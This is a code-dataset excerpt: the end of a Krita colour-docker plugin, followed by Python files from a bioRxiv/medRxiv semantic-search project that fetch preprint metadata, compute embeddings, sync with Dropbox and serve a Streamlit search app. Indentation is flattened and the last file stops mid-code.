pixmap.fill(QColor(*Convert.rgbFToInt8(*rgb, self.profileTRC(profile))))
item = QListWidgetItem()
item.setIcon(QIcon(pixmap))
self.history.insertItem(0, item)
if self.memory:
for i in reversed(range(self.history.count())):
if i > self.memory - 1:
self.history.takeItem(i)
self.pastColors.pop()
else:
break
self.history.horizontalScrollBar().setValue(0)
def setPastColor(self, index: int, fg=True):
view = Application.activeWindow().activeView()
if not view.visible():
return
if (self.color.bgMode and not fg) or (fg and not self.color.bgMode):
self.history.takeItem(index)
color = self.pastColors.pop(index)
rgb = color[0]
trc = self.profileTRC(color[1])
self.updateSyntax(rgb, trc)
if trc != self.trc:
rgb = Convert.rgbToTRC(rgb, self.trc)
self.updateChannels(rgb)
current = self.color.current
if fg:
view.setForeGroundColor(current)
# prevent setHistory again during getKritaColors
self.color.setForeGroundColor(current)
else:
view.setBackGroundColor(current)
# prevent setHistory again during getKritaColors
self.color.setBackGroundColor(current)
self.color.recent = current
self.setHistory()
else:
temp = self.color.temp
if fg:
view.setForeGroundColor(temp)
self.color.setForeGroundColor(temp)
else:
view.setBackGroundColor(temp)
self.color.setBackGroundColor(temp)
def clearHistory(self):
self.history.clear()
self.pastColors = []
def updateSyntax(self, rgb: tuple, trc: str):
if self.notation == NOTATION[0]:
self.text = Convert.rgbFToHexS(*rgb, trc)
elif self.notation == NOTATION[1]:
self.text = Convert.rgbFToOklabS(*rgb, trc)
elif self.notation == NOTATION[2]:
self.text = Convert.rgbFToOklchS(*rgb, trc)
self.syntax.setText(self.text)
def switchNotation(self):
view = Application.activeWindow().activeView()
if not view.visible():
return
notation = self.sender().toolTip()
self.setNotation(notation)
self.updateNotations()
color = view.foregroundColor()
trc = self.profileTRC(color.colorProfile())
self.updateSyntax(color.componentsOrdered()[:3], trc)
def setNotation(self, notation: str):
self.notation = notation
# syntax needs to be on to set notation currently
Application.writeSetting(DOCKER_NAME, "syntax", ",".join(["True", notation]))
def updateNotations(self):
i = NOTATION.index(self.notation)
if i == 0:
self.prevNotation.setToolTip(NOTATION[len(NOTATION) - 1])
self.nextNotation.setToolTip(NOTATION[i + 1])
elif i == len(NOTATION) - 1:
self.prevNotation.setToolTip(NOTATION[i - 1])
self.nextNotation.setToolTip(NOTATION[0])
else:
self.prevNotation.setToolTip(NOTATION[i - 1])
self.nextNotation.setToolTip(NOTATION[i + 1])
def parseSyntax(self):
view = Application.activeWindow().activeView()
if not view.visible():
return
syntax = self.syntax.text().strip()
if syntax == self.text:
return
rgb = None
notation = self.notation
if syntax[:1] == "#":
self.setNotation(NOTATION[0])
rgb = Convert.hexSToRgbF(syntax, self.trc)
elif syntax[:5].upper() == NOTATION[1]:
self.setNotation(NOTATION[1])
rgb = Convert.oklabSToRgbF(syntax, self.trc)
elif syntax[:5].upper() == NOTATION[2]:
self.setNotation(NOTATION[2])
rgb = Convert.oklchSToRgbF(syntax, self.trc)
if notation != self.notation:
self.updateNotations()
if rgb:
self.setKritaColor(rgb)
self.updateChannels(rgb)
else:
color = view.foregroundColor()
trc = self.profileTRC(color.colorProfile())
self.updateSyntax(color.componentsOrdered()[:3], trc)
def showEvent(self, event):
if TIME:
self.timer.start(TIME)
def closeEvent(self, event):
self.timer.stop()
def canvasChanged(self, canvas):
if self.document != Application.activeDocument():
self.document = Application.activeDocument()
self.trc = self.profileTRC(self.document.colorProfile())
self.color.resetColors()
self.syntax.setText("")
self.getKritaColors()
| 75,549 | Python | .py | 1,604 | 33.4202 | 120 | 0.575525 | lucifer9683/HCLSliders | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,183 | combine_databases.py | dzyla_biorxiv_search/combine_databases.py | import pandas as pd
import numpy as np
from pathlib import Path
def combine_databases():
# Define paths
aggregated_data_path = Path("aggregated_data")
db_update_bio_path = Path("db_update")
biorxiv_embeddings_path = Path("biorxiv_ubin_embaddings.npy")
embed_update_bio_path = Path("embed_update")
db_update_med_path = Path("db_update_med")
embed_update_med_path = Path("embed_update_med")
# Load existing database and embeddings for BioRxiv
df_bio_existing = pd.read_parquet(aggregated_data_path)
bio_embeddings_existing = np.load(biorxiv_embeddings_path, allow_pickle=True)
print(f"Existing BioRxiv data shape: {df_bio_existing.shape}, Existing BioRxiv embeddings shape: {bio_embeddings_existing.shape}")
# Determine the embedding size from existing embeddings
embedding_size = bio_embeddings_existing.shape[1]
# Prepare lists to collect new updates
bio_dfs_list = []
bio_embeddings_list = []
# Helper function to process updates from a specified directory
def process_updates(new_data_directory, updated_embeddings_directory, dfs_list, embeddings_list):
new_data_files = sorted(Path(new_data_directory).glob("*.parquet"))
for data_file in new_data_files:
corresponding_embedding_file = Path(updated_embeddings_directory) / (data_file.stem + ".npy")
if corresponding_embedding_file.exists():
df = pd.read_parquet(data_file)
new_embeddings = np.load(corresponding_embedding_file, allow_pickle=True)
# Check if the number of rows in the DataFrame matches the number of rows in the embeddings
if df.shape[0] != new_embeddings.shape[0]:
print(f"Shape mismatch for {data_file.name}: DataFrame has {df.shape[0]} rows, embeddings have {new_embeddings.shape[0]} rows. Skipping.")
continue
# Check embedding size and adjust if necessary
if new_embeddings.shape[1] != embedding_size:
print(f"Skipping {data_file.name} due to embedding size mismatch.")
continue
dfs_list.append(df)
embeddings_list.append(new_embeddings)
else:
print(f"No corresponding embedding file found for {data_file.name}")
# Process updates from both BioRxiv and MedRxiv
process_updates(db_update_bio_path, embed_update_bio_path, bio_dfs_list, bio_embeddings_list)
# Concatenate all BioRxiv updates
if bio_dfs_list:
df_bio_updates = pd.concat(bio_dfs_list)
else:
df_bio_updates = pd.DataFrame()
if bio_embeddings_list:
bio_embeddings_updates = np.vstack(bio_embeddings_list)
else:
bio_embeddings_updates = np.array([])
# Append new BioRxiv data to existing, handling duplicates as needed
df_bio_combined = pd.concat([df_bio_existing, df_bio_updates])
# Create a mask for filtering unique titles
bio_mask = ~df_bio_combined.duplicated(subset=["title"], keep="last")
df_bio_combined = df_bio_combined[bio_mask]
# Combine BioRxiv embeddings, ensuring alignment with the DataFrame
bio_embeddings_combined = (
np.vstack([bio_embeddings_existing, bio_embeddings_updates])
if bio_embeddings_updates.size
else bio_embeddings_existing
)
# Filter the embeddings based on the DataFrame unique entries
bio_embeddings_combined = bio_embeddings_combined[bio_mask]
assert df_bio_combined.shape[0] == bio_embeddings_combined.shape[0], "Shape mismatch between BioRxiv DataFrame and embeddings"
print(f"Filtered BioRxiv DataFrame shape: {df_bio_combined.shape}")
print(f"Filtered BioRxiv embeddings shape: {bio_embeddings_combined.shape}")
# Save combined BioRxiv DataFrame and embeddings
combined_biorxiv_data_path = aggregated_data_path / "combined_biorxiv_data.parquet"
df_bio_combined.to_parquet(combined_biorxiv_data_path)
print(f"Saved combined BioRxiv DataFrame to {combined_biorxiv_data_path}")
combined_biorxiv_embeddings_path = "biorxiv_ubin_embaddings.npy"
np.save(combined_biorxiv_embeddings_path, bio_embeddings_combined)
print(f"Saved combined BioRxiv embeddings to {combined_biorxiv_embeddings_path}")
# Prepare lists to collect new MedRxiv updates
med_dfs_list = []
med_embeddings_list = []
process_updates(db_update_med_path, embed_update_med_path, med_dfs_list, med_embeddings_list)
# Concatenate all MedRxiv updates
if med_dfs_list:
df_med_combined = pd.concat(med_dfs_list)
else:
df_med_combined = pd.DataFrame()
if med_embeddings_list:
med_embeddings_combined = np.vstack(med_embeddings_list)
else:
med_embeddings_combined = np.array([])
last_date_in_med_database = df_med_combined['date'].max() if not df_med_combined.empty else "unknown"
# Create a mask for filtering unique titles
med_mask = ~df_med_combined.duplicated(subset=["title"], keep="last")
df_med_combined = df_med_combined[med_mask]
med_embeddings_combined = med_embeddings_combined[med_mask]
assert df_med_combined.shape[0] == med_embeddings_combined.shape[0], "Shape mismatch between MedRxiv DataFrame and embeddings"
print(f"Filtered MedRxiv DataFrame shape: {df_med_combined.shape}")
print(f"Filtered MedRxiv embeddings shape: {med_embeddings_combined.shape}")
# Save combined MedRxiv DataFrame and embeddings
combined_medrxiv_data_path = db_update_med_path / f"database_{last_date_in_med_database}.parquet"
df_med_combined.to_parquet(combined_medrxiv_data_path)
print(f"Saved combined MedRxiv DataFrame to {combined_medrxiv_data_path}")
combined_medrxiv_embeddings_path = embed_update_med_path / f"database_{last_date_in_med_database}.npy"
np.save(combined_medrxiv_embeddings_path, med_embeddings_combined)
print(f"Saved combined MedRxiv embeddings to {combined_medrxiv_embeddings_path}")
if __name__ == "__main__":
combine_databases()
| 6,048 | Python | .py | 104 | 50.653846 | 158 | 0.708221 | dzyla/biorxiv_search | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,184 | update_database_medarxiv.py | dzyla_biorxiv_search/update_database_medarxiv.py | import pandas as pd
import numpy as np
from pathlib import Path
import datetime
import requests
import json
import os
from datetime import datetime
from dateutil.relativedelta import relativedelta
from concurrent.futures import ThreadPoolExecutor, as_completed
from sentence_transformers import SentenceTransformer
import torch
import shutil
import dropbox
import streamlit as st
import time
def retry_on_exception(exception, retries=5, delay=2):
def decorator(func):
def wrapper(*args, **kwargs):
last_exception = None
for _ in range(retries):
try:
return func(*args, **kwargs)
except exception as e:
last_exception = e
print(f"Retrying due to: {str(e)}")
time.sleep(delay)
raise last_exception
return wrapper
return decorator
@retry_on_exception(requests.exceptions.ConnectionError)
def fetch_and_save_data_block(endpoint, server, block_start, block_end, save_directory, format='json'):
base_url = f"https://api.medrxiv.org/details/{server}/"
block_interval = f"{block_start.strftime('%Y-%m-%d')}/{block_end.strftime('%Y-%m-%d')}"
block_data = []
cursor = 0
continue_fetching = True
while continue_fetching:
url = f"{base_url}{block_interval}/{cursor}/{format}"
response = requests.get(url)
if response.status_code != 200:
print(f"Failed to fetch data for block {block_interval} at cursor {cursor}. HTTP Status: {response.status_code}")
break
data = response.json()
fetched_papers = len(data['collection'])
if fetched_papers > 0:
block_data.extend(data['collection'])
cursor += fetched_papers
print(f"Fetched {fetched_papers} papers for block {block_interval}. Total fetched: {cursor}.")
else:
continue_fetching = False
if block_data:
save_data_block(block_data, block_start, block_end, endpoint, save_directory)
def save_data_block(block_data, start_date, end_date, endpoint, save_directory):
start_yymmdd = start_date.strftime("%y%m%d")
end_yymmdd = end_date.strftime("%y%m%d")
filename = f"{save_directory}/{endpoint}_data_{start_yymmdd}_{end_yymmdd}.json"
with open(filename, 'w') as file:
json.dump(block_data, file, indent=4)
print(f"Saved data block to {filename}")
def fetch_data(endpoint, server, interval, save_directory, format='json'):
os.makedirs(save_directory, exist_ok=True)
start_date, end_date = [datetime.strptime(date, "%Y-%m-%d") for date in interval.split('/')]
current_date = start_date
tasks = []
with ThreadPoolExecutor(max_workers=12) as executor:
while current_date <= end_date:
block_start = current_date
block_end = min(current_date + relativedelta(months=1) - relativedelta(days=1), end_date)
tasks.append(executor.submit(fetch_and_save_data_block, endpoint, server, block_start, block_end, save_directory, format))
current_date += relativedelta(months=1)
for future in as_completed(tasks):
future.result()
def load_json_to_dataframe(json_file):
with open(json_file, 'r') as file:
data = json.load(file)
return pd.DataFrame(data)
def save_dataframe(df, save_path):
df.to_parquet(save_path)
def process_json_files(directory, save_directory):
os.makedirs(save_directory, exist_ok=True)
json_files = list(Path(directory).glob('*.json'))
print(f'json_files {type(json_files)}: {json_files}')
for json_file in json_files:
df = load_json_to_dataframe(json_file)
parquet_filename = f"{json_file.stem}.parquet"
save_path = os.path.join(save_directory, parquet_filename)
if os.path.exists(save_path):
npy_file_path = save_path.replace('db_update', 'embed_update').replace('parquet', 'npy')
if os.path.exists(npy_file_path):
os.remove(npy_file_path)
print(f'Removed embedding file {npy_file_path} due to the dataframe update')
save_dataframe(df, save_path)
print(f"Processed and saved {json_file.name} to {parquet_filename}")
def load_unprocessed_parquets(db_update_directory, embed_update_directory):
db_update_directory = Path(db_update_directory)
embed_update_directory = Path(embed_update_directory)
parquet_files = list(db_update_directory.glob('*.parquet'))
npy_files = {f.stem for f in embed_update_directory.glob('*.npy')}
unprocessed_dataframes = []
for parquet_file in parquet_files:
if parquet_file.stem not in npy_files:
unprocessed_dataframes.append(parquet_file)
print(f"Loaded unprocessed Parquet file: {parquet_file.name}")
else:
print(f"Skipping processed Parquet file: {parquet_file.name}")
return unprocessed_dataframes
def connect_to_dropbox():
dropbox_APP_KEY = st.secrets["dropbox_APP_KEY"]
dropbox_APP_SECRET = st.secrets["dropbox_APP_SECRET"]
dropbox_REFRESH_TOKEN = st.secrets["dropbox_REFRESH_TOKEN"]
dbx = dropbox.Dropbox(
app_key=dropbox_APP_KEY,
app_secret=dropbox_APP_SECRET,
oauth2_refresh_token=dropbox_REFRESH_TOKEN
)
return dbx
def upload_path(local_path, dropbox_path):
dbx = connect_to_dropbox()
local_path = Path(local_path)
if local_path.is_file():
relative_path = local_path.name
dropbox_file_path = os.path.join(dropbox_path, relative_path).replace('\\', '/').replace('//', '/')
upload_file(local_path, dropbox_file_path, dbx)
elif local_path.is_dir():
for local_file in local_path.rglob('*'):
if local_file.is_file():
relative_path = local_file.relative_to(local_path.parent)
dropbox_file_path = os.path.join(dropbox_path, relative_path).replace('\\', '/').replace('//', '/')
upload_file(local_file, dropbox_file_path, dbx)
else:
print("The provided path does not exist.")
def upload_file(file_path, dropbox_file_path, dbx):
try:
dropbox_file_path = dropbox_file_path.replace('\\', '/')
try:
metadata = dbx.files_get_metadata(dropbox_file_path)
dropbox_mod_time = metadata.server_modified
local_mod_time = datetime.fromtimestamp(file_path.stat().st_mtime)
if dropbox_mod_time >= local_mod_time:
print(f"Skipped {dropbox_file_path}, Dropbox version is up-to-date.")
return
except dropbox.exceptions.ApiError as e:
if not isinstance(e.error, dropbox.files.GetMetadataError) or e.error.is_path() and e.error.get_path().is_not_found():
print(f"No existing file on Dropbox, proceeding with upload: {dropbox_file_path}")
else:
raise e
with file_path.open('rb') as f:
dbx.files_upload(f.read(), dropbox_file_path, mode=dropbox.files.WriteMode.overwrite)
print(f"Uploaded {dropbox_file_path}")
except Exception as e:
print(f"Failed to upload {dropbox_file_path}: {str(e)}")
def load_data_embeddings():
new_data_directory = "db_update_med"
updated_embeddings_directory = "embed_update_med"
new_data_files = sorted(Path(new_data_directory).glob("*.parquet"))
df_updates_list = []
embeddings_updates_list = []
for data_file in new_data_files:
# Assuming naming convention allows direct correlation
corresponding_embedding_file = Path(updated_embeddings_directory) / (
data_file.stem + ".npy"
)
if corresponding_embedding_file.exists():
# Load and append DataFrame and embeddings
df_updates_list.append(pd.read_parquet(data_file))
embeddings_updates_list.append(np.load(corresponding_embedding_file))
else:
print(f"No corresponding embedding file found for {data_file.name}")
new_data_files = sorted(Path(new_data_directory).glob("*.parquet"))
for data_file in new_data_files:
corresponding_embedding_file = Path(updated_embeddings_directory) / (
data_file.stem + ".npy"
)
if corresponding_embedding_file.exists():
df_updates_list.append(pd.read_parquet(data_file))
embeddings_updates_list.append(np.load(corresponding_embedding_file))
else:
print(f"No corresponding embedding file found for {data_file.name}")
if df_updates_list:
df_updates = pd.concat(df_updates_list)
else:
df_updates = pd.DataFrame()
if embeddings_updates_list:
embeddings_updates = np.vstack(embeddings_updates_list)
else:
embeddings_updates = np.array([])
df_combined = df_updates
mask = ~df_combined.duplicated(subset=["title"], keep="last")
df_combined = df_combined[mask]
embeddings_combined = embeddings_updates
embeddings_combined = embeddings_combined[mask]
return df_combined, embeddings_combined
endpoint = "details"
server = "medrxiv"
df, embeddings = load_data_embeddings()
try:
start_date = df['date'].max()
except:
start_date = '1990-01-01'
last_date = datetime.today().strftime('%Y-%m-%d')
interval = f'{start_date}/{last_date}'
print(f'using interval: {interval}')
save_directory = "db_update_json_med"
fetch_data(endpoint, server, interval, save_directory)
directory = r'db_update_json_med'
save_directory = r'db_update_med'
process_json_files(directory, save_directory)
db_update_directory = 'db_update_med'
embed_update_directory = 'embed_update_med'
unprocessed_dataframes = load_unprocessed_parquets(db_update_directory, embed_update_directory)
if unprocessed_dataframes:
for file in unprocessed_dataframes:
df = pd.read_parquet(file)
query = df['abstract'].tolist()
device = "cuda" if torch.cuda.is_available() else "cpu"
model = SentenceTransformer("mixedbread-ai/mxbai-embed-large-v1")
model.to(device)
query_embedding = model.encode(query, normalize_embeddings=True, precision='ubinary', show_progress_bar=True)
file_path = os.path.basename(file).split('.')[0]
os.makedirs('embed_update_med', exist_ok=True)
embeddings_path = f'embed_update_med/{file_path}'
np.save(embeddings_path, query_embedding)
print(f'Saved embeddings {embeddings_path}')
db_update_json = 'db_update_json_med'
shutil.rmtree(db_update_json)
print(f"Directory '{db_update_json}' and its contents have been removed.")
for path in ['db_update_med', 'embed_update_med']:
upload_path(path, '/')
else:
print('Nothing to do')
| 10,836 | Python | .py | 231 | 38.991342 | 134 | 0.665394 | dzyla/biorxiv_search | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,185 | streamlit_app.py | dzyla_biorxiv_search/streamlit_app.py | import streamlit as st
import pandas as pd
import os
import numpy as np
from sentence_transformers import SentenceTransformer, models
import torch
from sentence_transformers.quantization import semantic_search_faiss
from pathlib import Path
import time
import plotly.express as px
import doi
import requests
from groq import Groq
import dropbox
from datetime import datetime, timedelta
API_URL = (
"https://api-inference.huggingface.co/models/mixedbread-ai/mxbai-embed-large-v1"
)
summarization_API_URL = (
"https://api-inference.huggingface.co/models/Falconsai/text_summarization"
)
LLM_API_URL = (
"https://api-inference.huggingface.co/models/HuggingFaceH4/zephyr-7b-beta"
)
API_TOKEN = st.secrets["hf_token"] # Replace with your Hugging Face API token
headers = {"Authorization": f"Bearer {API_TOKEN}"}
def query_hf_api(text, api=API_URL, parameters=None):
if not parameters:
payload = {"inputs": text}
else:
payload = {
"inputs": text,
"parameters": parameters,
}
response = requests.post(api, headers=headers, json=payload)
try:
response_data = response.json()
except requests.exceptions.JSONDecodeError:
st.error("Failed to get a valid response from the server. Please try again later.")
return {}
# Prepare an empty placeholder that can be filled if needed
progress_placeholder = st.empty()
# Check if the model is currently loading
if "error" in response_data and "loading" in response_data["error"]:
estimated_time = response_data.get("estimated_time", 30) # Default wait time to 30 seconds if not provided
with progress_placeholder.container():
st.warning(f"Model from :hugging_face: is currently loading. Estimated wait time: {estimated_time:.1f} seconds. Please wait...")
# Create a progress bar within the container
progress_bar = st.progress(0)
for i in range(int(estimated_time) + 5): # Adding a buffer time to ensure the model is loaded
# Update progress bar. The factor of 100 is used to convert to percentage completion
progress = int((i / (estimated_time + 5)) * 100)
progress_bar.progress(progress)
time.sleep(1) # Wait for a second
# Clear the placeholder once loading is complete
progress_placeholder.empty()
st.rerun() # Rerun the app after waiting
return response_data
def normalize_embeddings(embeddings):
"""
Normalizes the embeddings matrix, so that each sentence embedding has unit length.
Args:
embeddings (Tensor): The embeddings tensor to normalize.
Returns:
Tensor: The normalized embeddings.
"""
if embeddings.dim() == 1:
# Add an extra dimension if the tensor is 1-dimensional
embeddings = embeddings.unsqueeze(0)
return torch.nn.functional.normalize(embeddings, p=2, dim=1)
def quantize_embeddings(
embeddings, precision="ubinary", ranges=None, calibration_embeddings=None
):
"""
Quantizes embeddings to a specified precision using PyTorch and numpy.
Args:
embeddings (Tensor): The embeddings to quantize, assumed to be a Tensor.
precision (str): The precision to convert to.
ranges (np.ndarray, optional): Ranges for quantization.
calibration_embeddings (Tensor, optional): Embeddings used for calibration.
Returns:
Tensor: The quantized embeddings.
"""
if precision == "float32":
return embeddings.float()
if precision in ["int8", "uint8"]:
if ranges is None:
if calibration_embeddings is not None:
ranges = torch.stack(
(
torch.min(calibration_embeddings, dim=0)[0],
torch.max(calibration_embeddings, dim=0)[0],
)
)
else:
ranges = torch.stack(
(torch.min(embeddings, dim=0)[0], torch.max(embeddings, dim=0)[0])
)
starts, ends = ranges[0], ranges[1]
steps = (ends - starts) / 255
if precision == "uint8":
quantized_embeddings = torch.clip(
((embeddings - starts) / steps), 0, 255
).byte()
elif precision == "int8":
quantized_embeddings = torch.clip(
((embeddings - starts) / steps - 128), -128, 127
).char()
elif precision == "binary" or precision == "ubinary":
embeddings_np = embeddings.numpy() > 0
packed_bits = np.packbits(embeddings_np, axis=-1)
if precision == "binary":
quantized_embeddings = torch.from_numpy(packed_bits - 128).char()
else:
quantized_embeddings = torch.from_numpy(packed_bits).byte()
else:
raise ValueError(f"Precision {precision} is not supported")
return quantized_embeddings
def process_embeddings(embeddings, precision="ubinary", calibration_embeddings=None):
"""
Normalizes and quantizes embeddings from an API list to a specified precision using PyTorch.
Args:
embeddings (list or Tensor): Raw embeddings from an external API, either as a list or a Tensor.
precision (str): Desired precision for quantization.
calibration_embeddings (Tensor, optional): Embeddings for calibration.
Returns:
Tensor: Processed embeddings, normalized and quantized.
"""
# Convert list to Tensor if necessary
if isinstance(embeddings, list):
embeddings = torch.tensor(embeddings, dtype=torch.float32)
elif not isinstance(embeddings, torch.Tensor):
st.error(embeddings)
raise TypeError(
f"Embeddings must be a list or a torch.Tensor. Message from the server: {embeddings}"
)
# Convert calibration_embeddings list to Tensor if necessary
if isinstance(calibration_embeddings, list):
calibration_embeddings = torch.tensor(
calibration_embeddings, dtype=torch.float32
)
elif calibration_embeddings is not None and not isinstance(
calibration_embeddings, torch.Tensor
):
raise TypeError(
"Calibration embeddings must be a list or a torch.Tensor if provided. "
)
normalized_embeddings = normalize_embeddings(embeddings)
quantized_embeddings = quantize_embeddings(
normalized_embeddings,
precision=precision,
calibration_embeddings=calibration_embeddings,
)
return quantized_embeddings.cpu().numpy()
def connect_to_dropbox():
dropbox_APP_KEY = st.secrets["dropbox_APP_KEY"]
dropbox_APP_SECRET = st.secrets["dropbox_APP_SECRET"]
dropbox_REFRESH_TOKEN = st.secrets["dropbox_REFRESH_TOKEN"]
dbx = dbx = dropbox.Dropbox(
app_key = dropbox_APP_KEY,
app_secret = dropbox_APP_SECRET,
oauth2_refresh_token = dropbox_REFRESH_TOKEN
)
return dbx
def list_files(dropbox_path):
dbx = connect_to_dropbox()
files = []
try:
response = dbx.files_list_folder(dropbox_path)
files = response.entries
except Exception as e:
st.error(f"Failed to list files: {str(e)}")
return files
def download_folder(dropbox_path, local_path):
placeholder = st.empty()
dbx = connect_to_dropbox()
try:
if not os.path.exists(local_path):
os.makedirs(local_path)
response = dbx.files_list_folder(dropbox_path)
total_files = len(response.entries)
if total_files == 0:
return
current_file = 0
for entry in response.entries:
local_file_path = Path(local_path) / entry.name
if isinstance(entry, dropbox.files.FileMetadata):
# Only download if the file does not exist locally
if not local_file_path.exists():
placeholder.write(f'Downloading {entry.name}')
dbx.files_download_to_file(str(local_file_path), entry.path_lower)
elif isinstance(entry, dropbox.files.FolderMetadata):
# Recursively download contents of the directory
download_folder(entry.path_lower, str(local_file_path))
current_file += 1
placeholder.empty()
except Exception as e:
st.error(f"Failed to download: {str(e)}")
placeholder.empty()
def download_data_from_dropbox():
# Check if 'last_download_time' is in the session state and if 24 hours have passed
if True:
placeholder = st.empty()
placeholder.write('Downloading data...')
local_path = os.getcwd()
# Run the download function
download_folder('//', local_path)
# Update the session state with the current time
st.session_state.last_download_time = datetime.now()
placeholder.write("Download completed and data updated.")
placeholder.empty()
# Load data and embeddings
@st.cache_resource(ttl="1d")
def load_data_embeddings():
existing_data_path = "aggregated_data"
new_data_directory_bio = "db_update"
existing_embeddings_path = "biorxiv_ubin_embaddings.npy"
updated_embeddings_directory_bio = "embed_update"
new_data_directory_med = "db_update_med"
updated_embeddings_directory_med = "embed_update_med"
# Load existing database and embeddings
df_existing = pd.read_parquet(existing_data_path)
embeddings_existing = np.load(existing_embeddings_path, allow_pickle=True)
print(f"Existing data shape: {df_existing.shape}, Existing embeddings shape: {embeddings_existing.shape}")
# Determine the embedding size from existing embeddings
embedding_size = embeddings_existing.shape[1]
# Prepare lists to collect new updates
df_updates_list = []
embeddings_updates_list = []
# Helper function to process updates from a specified directory
def process_updates(new_data_directory, updated_embeddings_directory):
new_data_files = sorted(Path(new_data_directory).glob("*.parquet"))
print(new_data_files)
for data_file in new_data_files:
corresponding_embedding_file = Path(updated_embeddings_directory) / (
data_file.stem + ".npy"
)
if corresponding_embedding_file.exists():
df = pd.read_parquet(data_file)
new_embeddings = np.load(corresponding_embedding_file, allow_pickle=True)
# Check if the number of rows in the DataFrame matches the number of rows in the embeddings
if df.shape[0] != new_embeddings.shape[0]:
print(f"Shape mismatch for {data_file.name}: DataFrame has {df.shape[0]} rows, embeddings have {new_embeddings.shape[0]} rows. Skipping.")
continue
# Check embedding size and adjust if necessary
if new_embeddings.shape[1] != embedding_size:
print(f"Skipping {data_file.name} due to embedding size mismatch.")
continue
df_updates_list.append(df)
embeddings_updates_list.append(new_embeddings)
else:
print(f"No corresponding embedding file found for {data_file.name}")
# Process updates from both BioRxiv and MedArXiv
process_updates(new_data_directory_bio, updated_embeddings_directory_bio)
process_updates(new_data_directory_med, updated_embeddings_directory_med)
# Concatenate all updates
if df_updates_list:
df_updates = pd.concat(df_updates_list)
else:
df_updates = pd.DataFrame()
if embeddings_updates_list:
embeddings_updates = np.vstack(embeddings_updates_list)
else:
embeddings_updates = np.array([])
# Append new data to existing, handling duplicates as needed
df_combined = pd.concat([df_existing, df_updates])
# Create a mask for filtering
mask = ~df_combined.duplicated(subset=["title"], keep="last")
df_combined = df_combined[mask]
# Combine embeddings, ensuring alignment with the DataFrame
embeddings_combined = (
np.vstack([embeddings_existing, embeddings_updates])
if embeddings_updates.size
else embeddings_existing
)
# Filter the embeddings based on the dataframe unique entries
embeddings_combined = embeddings_combined[mask]
return df_combined, embeddings_combined
LLM_prompt = "Review the abstracts listed below and create a list and summary that captures their main themes and findings. Identify any commonalities across the abstracts and highlight these in your summary. Ensure your response is concise, avoids external links, and is formatted in markdown.\n\n"
def summarize_abstract(abstract, llm_model="llama-3.1-70b-versatile", instructions=LLM_prompt, api_key=st.secrets["groq_token"]):
"""
Summarizes the provided abstract using a specified LLM model.
Parameters:
- abstract (str): The abstract text to be summarized.
- llm_model (str): The LLM model used for summarization. Defaults to "llama-3.1-70b-versatile".
Returns:
- str: A summary of the abstract, condensed into one to two sentences.
"""
# Initialize the Groq client with the API key from environment variables
client = Groq(api_key=api_key)
formatted_text = "\n".join(f"{idx + 1}. {abstract}" for idx, abstract in enumerate(abstracts))
try:
# Create a chat completion with the abstract and specified LLM model
chat_completion = client.chat.completions.create(
messages=[{"role": "user", "content": f'{instructions} "{formatted_text}"'}],
model=llm_model,
)
except:
return 'Groq model not available or above the usage limit. Use own API key from here: https://console.groq.com/keys'
# Return the summarized content
return chat_completion.choices[0].message.content
### To use with local setup
# @st.cache_resource()
# def model_to_device():
# # Determine the device to use: use CUDA if available; otherwise, use CPU.
# device = "cuda" if torch.cuda.is_available() else "cpu"
# model = SentenceTransformer("mixedbread-ai/mxbai-embed-large-v1")
# model.to(device)
# return model
def define_style():
st.markdown(
"""
<style>
.stExpander > .stButton > button {
width: 100%;
border: none;
background-color: #f0f2f6;
color: #333;
text-align: left;
padding: 15px;
font-size: 18px;
border-radius: 10px;
margin-top: 5px;
}
.stExpander > .stExpanderContent {
padding-left: 10px;
padding-top: 10px;
}
a {
color: #FF4B4B;
text-decoration: none;
}
</style>
""",
unsafe_allow_html=True,
)
def logo(db_update_date, db_size_bio, db_size_med):
# Initialize Streamlit app
biorxiv_logo = "https://www.biorxiv.org/sites/default/files/biorxiv_logo_homepage.png"
medarxiv_logo = "https://www.medrxiv.org/sites/default/files/medRxiv_homepage_logo.png"
st.markdown(
f"""
<div style='display: flex; justify-content: center; align-items: center;'>
<div style='margin-right: 20px;'>
<img src='{biorxiv_logo}' alt='BioRxiv logo' style='max-height: 100px;'>
</div>
<div style='margin-left: 20px;'>
<img src='{medarxiv_logo}' alt='medRxiv logo' style='max-height: 100px;'>
</div>
</div>
<div style='text-align: center; margin-top: 10px;'>
<h3 style='color: black;'>Manuscript Semantic Search [bMSS]</h3>
Last database update: {db_update_date}; Database size: bioRxiv: {db_size_bio} / medRxiv: {db_size_med} entries
</div>
<br>
""",
unsafe_allow_html=True,
)
st.set_page_config(
page_title="bMSS",
page_icon=":scroll:",
)
download_data_from_dropbox()
define_style()
df, embeddings_unique = load_data_embeddings()
logo(df["date"].max(), df[df['server']=='biorxiv'].shape[0], df[df['server']=='medrxiv'].shape[0])
# model = model_to_device()
corpus_index = None
corpus_precision = "ubinary"
use_hf = False
query = st.text_input("Enter your search query:")
col1, col2 = st.columns(2)
with col1:
num_to_show = st.number_input(
"Number of results to show:", min_value=1, max_value=50, value=10
)
with col2:
use_ai = st.checkbox('Use AI generated summary?')
if use_ai:
with col2:
groq_api_provided = st.text_input('Own Groq API KEY to remove limits', '', help='To obtain own Groq key go to https://console.groq.com/keys')
if not groq_api_provided:
groq_api_provided = st.secrets["groq_token"]
#use_hf = st.checkbox('Use free HF gemma 2B instead? (poor quality)')
if query:
with st.spinner("Searching..."):
# Encode the query
search_start_time = time.time()
# query_embedding = model.encode([query], normalize_embeddings=True, precision=corpus_precision)
embedding_time = time.time()
raw_embadding = query_hf_api(query)
query_embedding = process_embeddings(raw_embadding)
embedding_time_total = time.time() - embedding_time
# Perform the search
results, search_time, corpus_index = semantic_search_faiss(
query_embedding,
corpus_index=corpus_index,
corpus_embeddings=embeddings_unique if corpus_index is None else None,
corpus_precision=corpus_precision,
top_k=num_to_show, # type: ignore
calibration_embeddings=None,
rescore=False,
rescore_multiplier=4,
exact=True,
output_index=True,
)
search_end_time = time.time()
search_duration = search_end_time - search_start_time
st.markdown(
f"<h6 style='text-align: center; color: #7882af;'>Search Completed in {search_duration:.2f} seconds (embeddings time: {embedding_time_total:.2f})</h3>",
unsafe_allow_html=True,
)
# Prepare the results for plotting
